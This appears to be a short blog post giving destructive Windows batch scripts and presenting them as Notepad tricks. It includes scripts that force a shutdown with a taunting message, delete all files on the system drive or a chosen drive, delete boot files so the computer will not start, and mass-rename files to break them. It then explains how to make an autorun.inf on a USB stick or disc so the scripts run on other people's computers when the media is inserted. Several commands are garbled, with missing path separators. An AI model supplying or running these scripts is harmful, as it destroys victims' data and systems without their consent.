Your Notepad Have More Power It can Destroy your System
Normal Coding
And
Just Changing .txt to .Bat
Just Write The Code in Notepad And Save It As .Bat
-ShutDown Your PC
This Command Will Shutdown Any Ones Pc
@echo off
shutdown -c "Bye Bye Foool..." -s
-Delete Your System Drive
System Drive Will Be Deleted And All Data Will Be DEstroyed@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
-Delete Particular Drive
Delete Particular Drive Data
Rename C with The Drive You Want To Empty@Echo off
Del C: *.* |y
-Crashes pc
This Command Will Destroy Boot File So That Computer Will Not Start Again
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER System:Drive
-Make Pc Data Use-Less
REN *.Format wants to convert *.Any Other Format
Eg:REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
This Will Convert Any File Right Extension To Any Useless Extension And MAke It Useless
This Command Are Not Automatic Activated
But By Making
A small Autorun File Can Make Them Execute as The Source Inserted Into Computer
Now Again Its Power Of Notepad
-If ShutDown Command Is To Be Executed
-Just Make The Bat File And Place In disk or pendrive
-Now Make A New Notepad File
Copy Following Command
[autorun]
open=Filename.bat/Filename.exe
-Save It As Autorun.inf
-Burn It On External Media
Now Just By Inserting The Media The Command Will Exceute
0 comments:
Post a Comment